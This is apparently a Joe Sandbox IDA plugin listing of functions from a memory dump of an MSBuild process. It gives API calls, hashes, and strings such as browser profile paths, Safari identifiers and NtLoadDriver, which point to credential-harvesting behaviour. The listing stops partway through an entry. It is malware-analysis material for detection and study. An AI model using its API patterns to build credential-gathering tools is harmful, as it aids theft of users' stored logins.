                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Version
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                                                    • Opcode ID: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                    • Instruction ID: 34334e4c1a53cba42546035453d5331cf18162d9798f59f763323439a3546438
                                                                                                                                                                                    • Opcode Fuzzy Hash: 65fe17fce0a62211919799e39ce3b7c1e35ae55805528a641db57f2e5b506d3e
                                                                                                                                                                                    • Instruction Fuzzy Hash: BAE0463590131CCFEB24DB34DB0B7C676F5AB08B46F0104F4C20AC2092D3789688CA2A
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                                                    • memset.MSVCRT ref: 0040265F
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000011), ref: 0040269B
                                                                                                                                                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,0000001C,?,?,00000000,?), ref: 004026FF
                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmp$Freememcpy$Library$AddressLocalProcmemsetwcslen
                                                                                                                                                                                    • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                                                                                                                                                                                    • API String ID: 577499730-1134094380
                                                                                                                                                                                    • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                    • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                                                                                                                    • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                                                                                                                    • String ID: :stringdata$ftp://$http://$https://
                                                                                                                                                                                    • API String ID: 2787044678-1921111777
                                                                                                                                                                                    • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                    • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                                                                                                                    • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                                                                                                                    • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                                                                                                                    • GetDC.USER32 ref: 004140E3
                                                                                                                                                                                    • wcslen.MSVCRT ref: 00414123
                                                                                                                                                                                    • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                                                                                                                    • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 00414244
                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                                                                                                                    • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                                                                                                                    • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                                                                                                                    • String ID: %s:$EDIT$STATIC
                                                                                                                                                                                    • API String ID: 2080319088-3046471546
                                                                                                                                                                                    • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                    • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                                                                                                                    • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 00413221
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                                                                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                                                                                                                    • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                                                                                                                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                                                                                                                    • memset.MSVCRT ref: 00413292
                                                                                                                                                                                    • memset.MSVCRT ref: 004132B4
                                                                                                                                                                                    • memset.MSVCRT ref: 004132CD
                                                                                                                                                                                    • memset.MSVCRT ref: 004132E1
                                                                                                                                                                                    • memset.MSVCRT ref: 004132FB
                                                                                                                                                                                    • memset.MSVCRT ref: 00413310
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                                                                                                                    • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                                                                                                                    • memset.MSVCRT ref: 004133C0
                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                                                                                                                    • memcpy.MSVCRT(?,0045AA90,0000021C), ref: 004133FC
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0041341F
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0041348E
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 004134B7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                                                                                                                    • {Unknown}, xrefs: 004132A6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                                                    • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                                                    • API String ID: 4111938811-1819279800
                                                                                                                                                                                    • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                    • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                                                    • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                                                    • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                                                    • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                                                    • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                                                    • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                                                    • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                                                    • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                                                    • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 829165378-0
                                                                                                                                                                                    • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                    • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                                                    • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00404172
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                                                    • memset.MSVCRT ref: 00404200
                                                                                                                                                                                    • memset.MSVCRT ref: 00404215
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                                                    • memset.MSVCRT ref: 0040426E
                                                                                                                                                                                    • memset.MSVCRT ref: 004042CD
                                                                                                                                                                                    • memset.MSVCRT ref: 004042E2
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                                                    • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                                                    • API String ID: 2454223109-1580313836
                                                                                                                                                                                    • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                    • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                                                    • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                                                    • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                                                    • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                                                    • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                                                    • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                                                    • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                                                    • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                                      • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                                      • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                                                    • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                                                    • API String ID: 4054529287-3175352466
                                                                                                                                                                                    • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                    • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                                                    • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                    • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                    • API String ID: 667068680-2887671607
                                                                                                                                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                                                                                                    • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1043902810-0
                                                                                                                                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                                                    • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                    • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000008.00000002.2071146215.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                    • API String ID: 2899246560-1542517562
                                                                                                                                                                                    • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                    • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
